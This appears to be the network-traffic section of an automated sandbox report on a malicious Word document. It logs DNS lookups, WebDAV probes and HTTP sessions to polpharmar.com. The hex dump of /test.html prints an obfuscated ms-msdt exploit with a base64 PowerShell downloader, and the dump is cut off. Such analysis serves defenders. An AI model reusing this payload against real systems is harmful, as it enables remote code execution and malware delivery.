            Aug 1, 2022 10:49:49.640312910 CEST4917280192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:49.640367985 CEST4917280192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:49.689097881 CEST804917291.235.116.180192.168.2.22
            Aug 1, 2022 10:49:49.881912947 CEST4917380192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:49.930389881 CEST804917391.235.116.180192.168.2.22
            Aug 1, 2022 10:49:49.930533886 CEST4917380192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:49.930742979 CEST4917380192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:49.978899002 CEST804917391.235.116.180192.168.2.22
            Aug 1, 2022 10:49:49.981864929 CEST804917391.235.116.180192.168.2.22
            Aug 1, 2022 10:49:50.182560921 CEST4917380192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:50.230763912 CEST804917391.235.116.180192.168.2.22
            Aug 1, 2022 10:49:50.230948925 CEST4917380192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:51.319211960 CEST4917380192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:51.371577978 CEST804917391.235.116.180192.168.2.22
            Aug 1, 2022 10:49:51.571059942 CEST4917380192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:52.743328094 CEST4917380192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:52.796791077 CEST804917391.235.116.180192.168.2.22
            Aug 1, 2022 10:49:52.844263077 CEST4917180192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:52.844916105 CEST4917480192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:52.893034935 CEST804917191.235.116.180192.168.2.22
            Aug 1, 2022 10:49:52.893435955 CEST804917491.235.116.180192.168.2.22
            Aug 1, 2022 10:49:52.893615007 CEST4917480192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:52.900791883 CEST4917480192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:52.949476957 CEST804917491.235.116.180192.168.2.22
            Aug 1, 2022 10:49:52.950392962 CEST804917491.235.116.180192.168.2.22
            Aug 1, 2022 10:49:52.950459957 CEST804917491.235.116.180192.168.2.22
            Aug 1, 2022 10:49:52.950469017 CEST804917491.235.116.180192.168.2.22
            Aug 1, 2022 10:49:52.950470924 CEST4917480192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:52.950478077 CEST804917491.235.116.180192.168.2.22
            Aug 1, 2022 10:49:52.950488091 CEST804917491.235.116.180192.168.2.22
            Aug 1, 2022 10:49:52.950506926 CEST804917491.235.116.180192.168.2.22
            Aug 1, 2022 10:49:52.950517893 CEST4917480192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:52.950521946 CEST804917491.235.116.180192.168.2.22
            Aug 1, 2022 10:49:52.950537920 CEST804917491.235.116.180192.168.2.22
            Aug 1, 2022 10:49:52.950544119 CEST4917480192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:52.950552940 CEST804917491.235.116.180192.168.2.22
            Aug 1, 2022 10:49:52.950567007 CEST804917491.235.116.180192.168.2.22
            Aug 1, 2022 10:49:52.950567961 CEST4917480192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:52.950597048 CEST4917480192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:52.950613976 CEST4917480192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:52.954075098 CEST4917480192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:52.990808010 CEST4917380192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:53.274751902 CEST4917480192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:53.324143887 CEST804917491.235.116.180192.168.2.22
            Aug 1, 2022 10:49:53.329531908 CEST4917480192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:53.569763899 CEST4917480192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:53.619056940 CEST804917491.235.116.180192.168.2.22
            Aug 1, 2022 10:49:53.619286060 CEST4917480192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:54.343363047 CEST4917580192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:54.391961098 CEST804917591.235.116.180192.168.2.22
            Aug 1, 2022 10:49:54.392148018 CEST4917580192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:54.392364979 CEST4917580192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:54.440833092 CEST804917591.235.116.180192.168.2.22
            Aug 1, 2022 10:49:54.441466093 CEST804917591.235.116.180192.168.2.22
            Aug 1, 2022 10:49:54.644490957 CEST4917580192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:54.690577030 CEST804917591.235.116.180192.168.2.22
            Aug 1, 2022 10:49:54.690649033 CEST4917580192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:55.436187983 CEST4917380192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:55.487442970 CEST804917391.235.116.180192.168.2.22
            Aug 1, 2022 10:49:55.689749002 CEST4917380192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:56.788990974 CEST4917380192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:56.839572906 CEST804917391.235.116.180192.168.2.22
            Aug 1, 2022 10:49:56.855813026 CEST4917480192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:56.904831886 CEST804917491.235.116.180192.168.2.22
            Aug 1, 2022 10:49:56.905010939 CEST4917480192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:56.926876068 CEST4917480192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:56.976238966 CEST804917491.235.116.180192.168.2.22
            Aug 1, 2022 10:49:56.976454020 CEST4917480192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:57.047100067 CEST4917380192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:57.166090012 CEST4917480192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:57.215281963 CEST804917491.235.116.180192.168.2.22
            Aug 1, 2022 10:49:57.215473890 CEST4917480192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:59.447031021 CEST804917591.235.116.180192.168.2.22
            Aug 1, 2022 10:49:59.447299957 CEST4917580192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:59.448188066 CEST4917580192.168.2.2291.235.116.180
            Aug 1, 2022 10:49:59.496814013 CEST804917591.235.116.180192.168.2.22
            Aug 1, 2022 10:50:01.844790936 CEST804917391.235.116.180192.168.2.22
            Aug 1, 2022 10:50:01.844955921 CEST4917380192.168.2.2291.235.116.180
            Aug 1, 2022 10:50:01.844994068 CEST4917380192.168.2.2291.235.116.180
            Aug 1, 2022 10:50:01.893204927 CEST804917391.235.116.180192.168.2.22
            Aug 1, 2022 10:50:02.219672918 CEST804917491.235.116.180192.168.2.22
            Aug 1, 2022 10:50:02.219764948 CEST4917480192.168.2.2291.235.116.180
            Aug 1, 2022 10:51:03.713165045 CEST4917480192.168.2.2291.235.116.180
            TimestampSource PortDest PortSource IPDest IP
            Aug 1, 2022 10:49:38.539911985 CEST5586853192.168.2.228.8.8.8
            Aug 1, 2022 10:49:38.559703112 CEST53558688.8.8.8192.168.2.22
            Aug 1, 2022 10:49:44.487778902 CEST4968853192.168.2.228.8.8.8
            Aug 1, 2022 10:49:44.505176067 CEST53496888.8.8.8192.168.2.22
            Aug 1, 2022 10:49:44.509357929 CEST5883653192.168.2.228.8.8.8
            Aug 1, 2022 10:49:44.536066055 CEST53588368.8.8.8192.168.2.22
            Aug 1, 2022 10:49:49.798683882 CEST5013453192.168.2.228.8.8.8
            Aug 1, 2022 10:49:49.816215992 CEST53501348.8.8.8192.168.2.22
            Aug 1, 2022 10:49:49.818392038 CEST5527553192.168.2.228.8.8.8
            Aug 1, 2022 10:49:49.880886078 CEST53552758.8.8.8192.168.2.22
            Aug 1, 2022 10:49:54.283454895 CEST5991553192.168.2.228.8.8.8
            Aug 1, 2022 10:49:54.311333895 CEST53599158.8.8.8192.168.2.22
            Aug 1, 2022 10:49:54.323168039 CEST5440853192.168.2.228.8.8.8
            Aug 1, 2022 10:49:54.342415094 CEST53544088.8.8.8192.168.2.22
            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
            Aug 1, 2022 10:49:38.539911985 CEST192.168.2.228.8.8.80xdd01Standard query (0)polpharmar.comA (IP address)IN (0x0001)
            Aug 1, 2022 10:49:44.487778902 CEST192.168.2.228.8.8.80x53f0Standard query (0)polpharmar.comA (IP address)IN (0x0001)
            Aug 1, 2022 10:49:44.509357929 CEST192.168.2.228.8.8.80x4117Standard query (0)polpharmar.comA (IP address)IN (0x0001)
            Aug 1, 2022 10:49:49.798683882 CEST192.168.2.228.8.8.80xdc64Standard query (0)polpharmar.comA (IP address)IN (0x0001)
            Aug 1, 2022 10:49:49.818392038 CEST192.168.2.228.8.8.80xbe50Standard query (0)polpharmar.comA (IP address)IN (0x0001)
            Aug 1, 2022 10:49:54.283454895 CEST192.168.2.228.8.8.80xb76dStandard query (0)polpharmar.comA (IP address)IN (0x0001)
            Aug 1, 2022 10:49:54.323168039 CEST192.168.2.228.8.8.80x5851Standard query (0)polpharmar.comA (IP address)IN (0x0001)
            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
            Aug 1, 2022 10:49:38.559703112 CEST8.8.8.8192.168.2.220xdd01No error (0)polpharmar.com91.235.116.180A (IP address)IN (0x0001)
            Aug 1, 2022 10:49:44.505176067 CEST8.8.8.8192.168.2.220x53f0No error (0)polpharmar.com91.235.116.180A (IP address)IN (0x0001)
            Aug 1, 2022 10:49:44.536066055 CEST8.8.8.8192.168.2.220x4117No error (0)polpharmar.com91.235.116.180A (IP address)IN (0x0001)
            Aug 1, 2022 10:49:49.816215992 CEST8.8.8.8192.168.2.220xdc64No error (0)polpharmar.com91.235.116.180A (IP address)IN (0x0001)
            Aug 1, 2022 10:49:49.880886078 CEST8.8.8.8192.168.2.220xbe50No error (0)polpharmar.com91.235.116.180A (IP address)IN (0x0001)
            Aug 1, 2022 10:49:54.311333895 CEST8.8.8.8192.168.2.220xb76dNo error (0)polpharmar.com91.235.116.180A (IP address)IN (0x0001)
            Aug 1, 2022 10:49:54.342415094 CEST8.8.8.8192.168.2.220x5851No error (0)polpharmar.com91.235.116.180A (IP address)IN (0x0001)
            • polpharmar.com
            Session IDSource IPSource PortDestination IPDestination PortProcess
            0192.168.2.224917191.235.116.18080C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            TimestampkBytes transferredDirectionData
            Aug 1, 2022 10:49:38.621876955 CEST0OUTOPTIONS / HTTP/1.1
            User-Agent: Microsoft Office Protocol Discovery
            Host: polpharmar.com
            Content-Length: 0
            Connection: Keep-Alive
            Aug 1, 2022 10:49:38.674829960 CEST0INHTTP/1.1 200 OK
            Date: Mon, 01 Aug 2022 08:49:38 GMT
            Server: Apache
            Allow: GET,POST,OPTIONS,HEAD
            Content-Length: 0
            Keep-Alive: timeout=5, max=100
            Connection: Keep-Alive
            Content-Type: httpd/unix-directory


            Session IDSource IPSource PortDestination IPDestination PortProcess
            1192.168.2.224917291.235.116.18080C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            TimestampkBytes transferredDirectionData
            Aug 1, 2022 10:49:44.586869001 CEST1OUTHEAD /test.html HTTP/1.1
            Connection: Keep-Alive
            User-Agent: Microsoft Office Existence Discovery
            Host: polpharmar.com
            Aug 1, 2022 10:49:44.636255026 CEST2INHTTP/1.1 200 OK
            Date: Mon, 01 Aug 2022 08:49:44 GMT
            Server: Apache
            Last-Modified: Sun, 31 Jul 2022 09:45:54 GMT
            Accept-Ranges: bytes
            Content-Length: 12744
            Keep-Alive: timeout=5, max=100
            Connection: Keep-Alive
            Content-Type: text/html
            Aug 1, 2022 10:49:44.884654045 CEST2INHTTP/1.1 200 OK
            Date: Mon, 01 Aug 2022 08:49:44 GMT
            Server: Apache
            Last-Modified: Sun, 31 Jul 2022 09:45:54 GMT
            Accept-Ranges: bytes
            Content-Length: 12744
            Keep-Alive: timeout=5, max=100
            Connection: Keep-Alive
            Content-Type: text/html


            Session IDSource IPSource PortDestination IPDestination PortProcess
            2192.168.2.224917391.235.116.18080C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            TimestampkBytes transferredDirectionData
            Aug 1, 2022 10:49:49.930742979 CEST3OUTOPTIONS / HTTP/1.1
            Connection: Keep-Alive
            User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
            translate: f
            Host: polpharmar.com
            Aug 1, 2022 10:49:49.981864929 CEST3INHTTP/1.1 200 OK
            Date: Mon, 01 Aug 2022 08:49:49 GMT
            Server: Apache
            Allow: GET,POST,OPTIONS,HEAD
            Content-Length: 0
            Keep-Alive: timeout=5, max=100
            Connection: Keep-Alive
            Content-Type: httpd/unix-directory
            Aug 1, 2022 10:49:50.230763912 CEST4INHTTP/1.1 200 OK
            Date: Mon, 01 Aug 2022 08:49:49 GMT
            Server: Apache
            Allow: GET,POST,OPTIONS,HEAD
            Content-Length: 0
            Keep-Alive: timeout=5, max=100
            Connection: Keep-Alive
            Content-Type: httpd/unix-directory
            Aug 1, 2022 10:49:51.319211960 CEST4OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69
            Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: polpharmar.com
            Aug 1, 2022 10:49:51.371577978 CEST4INHTTP/1.1 405 Method Not Allowed
            Date: Mon, 01 Aug 2022 08:49:51 GMT
            Server: Apache
            Allow: GET,POST,OPTIONS,HEAD
            Content-Length: 348
            Keep-Alive: timeout=5, max=99
            Connection: Keep-Alive
            Content-Type: text/html; charset=iso-8859-1
            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 47 45 54 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method GET is not allowed for this URL.</p><p>Additionally, a 405 Method Not Allowederror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Aug 1, 2022 10:49:52.743328094 CEST5OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69
            Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: polpharmar.com
            Aug 1, 2022 10:49:52.796791077 CEST5INHTTP/1.1 405 Method Not Allowed
            Date: Mon, 01 Aug 2022 08:49:52 GMT
            Server: Apache
            Allow: GET,POST,OPTIONS,HEAD
            Content-Length: 348
            Keep-Alive: timeout=5, max=98
            Connection: Keep-Alive
            Content-Type: text/html; charset=iso-8859-1
            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 47 45 54 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method GET is not allowed for this URL.</p><p>Additionally, a 405 Method Not Allowederror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Aug 1, 2022 10:49:55.436187983 CEST22OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69
            Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: polpharmar.com
            Aug 1, 2022 10:49:55.487442970 CEST23INHTTP/1.1 405 Method Not Allowed
            Date: Mon, 01 Aug 2022 08:49:55 GMT
            Server: Apache
            Allow: GET,POST,OPTIONS,HEAD
            Content-Length: 348
            Keep-Alive: timeout=5, max=97
            Connection: Keep-Alive
            Content-Type: text/html; charset=iso-8859-1
            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 47 45 54 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method GET is not allowed for this URL.</p><p>Additionally, a 405 Method Not Allowederror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Aug 1, 2022 10:49:56.788990974 CEST23OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69
            Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: polpharmar.com
            Aug 1, 2022 10:49:56.839572906 CEST24INHTTP/1.1 405 Method Not Allowed
            Date: Mon, 01 Aug 2022 08:49:56 GMT
            Server: Apache
            Allow: GET,POST,OPTIONS,HEAD
            Content-Length: 348
            Keep-Alive: timeout=5, max=96
            Connection: Keep-Alive
            Content-Type: text/html; charset=iso-8859-1
            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 47 45 54 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method GET is not allowed for this URL.</p><p>Additionally, a 405 Method Not Allowederror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


            Session IDSource IPSource PortDestination IPDestination PortProcess
            3192.168.2.224917491.235.116.18080C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            TimestampkBytes transferredDirectionData
            Aug 1, 2022 10:49:52.900791883 CEST6OUTGET /test.html HTTP/1.1
            Accept: */*
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
            UA-CPU: AMD64
            Accept-Encoding: gzip, deflate
            Host: polpharmar.com
            Connection: Keep-Alive
            Aug 1, 2022 10:49:52.950392962 CEST7INHTTP/1.1 200 OK
            Date: Mon, 01 Aug 2022 08:49:52 GMT
            Server: Apache
            Last-Modified: Sun, 31 Jul 2022 09:45:54 GMT
            Accept-Ranges: bytes
            Content-Length: 12744
            Keep-Alive: timeout=5, max=100
            Connection: Keep-Alive
            Content-Type: text/html
            Data Raw: 3c 21 64 4f 63 54 79 70 45 20 48 54 6d 6c 3e 0d 0a 0d 0a 3c 48 54 6d 4c 3e 0d 0a 0d 0a 3c 62 6f 44 59 3e 0d 0a 0d 0a 3c 53 43 72 49 70 54 20 74 79 70 45 3d 22 74 65 78 74 2f 4a 53 63 72 69 70 74 22 3e 0d 0a 0d 0a 0d 0a 0d 0a 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 22 6d 22 20 20 2b 20 22 73 2d 6d 73 64 74 3a 2f 22 20 20 2b 20 22 49 44 22 20 20 2b 20 22 20 22 20 2b 20 22 50 63 77 64 69 41 67 6e 4f 53 54 69 22 20 20 2b 20 22 43 22 20 20 2b 20 22 20 22 20 2b 20 22 2d 73 4b 69 22 20 20 2b 20 22 50 22 20 20 2b 20 22 20 22 20 2b 20 22 66 6f 72 22 20 20 2b 20 22 43 22 20 20 2b 20 22 65 22 20 20 2b 20 22 20 22 20 2b 20 22 2d 70 41 72 41 22 20 20 2b 20 22 6d 22 20 20 2b 20 22 20 22 20 2b 20 22 5c 22 22 20 2b 20 22 49 54 5f 52 65 42 52 6f 77 73 65 66 6f 72 66 69 4c 22 20 20 2b 20 22 45 22 20 20 2b 20 22 3d 22 20 20 2b 20 22 23 4a 61 32 59 22 20 2b 20 22 20 22 20 2b 20 22 49 54 5f 4c 61 75 6e 63 68 4d 65 74 68 6f 64 3d 43 6f 6e 74 65 78 74 22 20 20 2b 20 22 4d 65 6e 75 22 20 20 2b 20 22 20 22 20 2b 20 22 49 54 5f 42 72 6f 77 73 65 46 6f 72 46 69 22 20 20 2b 20 22 6c 22 20 20 2b 20 22 65 3d 22 20 20 2b 20 22 57 35 41 24 28 22 20 2b 20 22 49 65 78 28 24 28 49 65 58 28 27 5b 73 59 53 54 65 6d 2e 74 65 58 74 2e 65 6e 43 4f 44 69 6e 47 5d 27 2b 5b 63 48 61 72 5d 35 38 2b 5b 63 68 41 52 5d 35 38 2b 27 75 54 66 38 2e 67 65 54 53 74 52 69 4e 67 28 5b 73 59 53 74 65 6d 2e 43 6f 4e 56 45 72 54 5d 27 2b 5b 63 68 61 72 5d 35 38 2b 22 20 20 2b 20 22 5b 63 68 61 72 5d 30 78 33 41 2b 27 66 52 6f 6d 62 41 53 65 36 34 53 74 52 49 4e 67 28 27 2b 5b 43 48 61 72 5d 30 58 32 32 2b 27 55 31 52 50 63 43 31 51 63 6b 39 6a 5a 58 4e 54 49 43 31 6d 62 31 4a 6a 5a 53 41 74 54 6d 46 4e 5a 53 41 6e 62 58 4e 6b 64 43 63 37 4a 45 74 5a 49 44 30 67 59 57 52 6b 4c 58 52 5a 55 45 55 67 4c 57 31 6c 62 55 4a 6c 63 6d 52 46 52 6d 6c 75 61 56 52 4a 54 30 34 67 4a 31 74 45 62 47 78 4a 62 58 42 76 63 6e 51 6f 49 6c 56 53 62 47 31 76 54 69 35 45 62 45 77 69 4c 43 42 44 61 47 46 79 55 32 56 30 49 44 30 67 51 32 68 68 63 6c 4e 6c 64 43 35 56 62 6d 6c 6a 62 32 52 6c 4b 56 31 77 64 57 4a 73 61 57 4d 67 63 33 52 68 64 47 6c 6a 49 47 56 34 64 47 56 79 62 69 42 4a 62 6e 52 51 64 48 49 67 56 56 4a 4d 52 47 39 33 62 6d 78 76 59 57 52 55 62 30 5a 70 62 47 55 6f 53 57 35 30 55 48 52 79 49 46 49 73 63 33 52 79 61 57 35 6e 49 47 4a 70 54 43 78 7a 64 48 4a 70 62 6d 63 67 64 58 64 6c 4c 48 56 70 62 6e 51 67 55 6d 35 76 4c 45 6c 75 64 46 42 30 63 69 42 31 52 79 6b 37 4a 79 41 74 62 6b 46 74 52 53 41 69 57 58 5a 52 49 69 41 74 54 6b 46 22 20 20 2b 20 22 74 52 56 4e 51 59 55 4e 6c 49 45 68 4c 5a 79 41 74 55 47 46 7a 63 31 52 6f 63 6e 55 37 49 43 52 4c 57 54 6f 36 56 56 4a 4d 52 47 39 33 62 6d 78 76 59 57 52 55 62 30 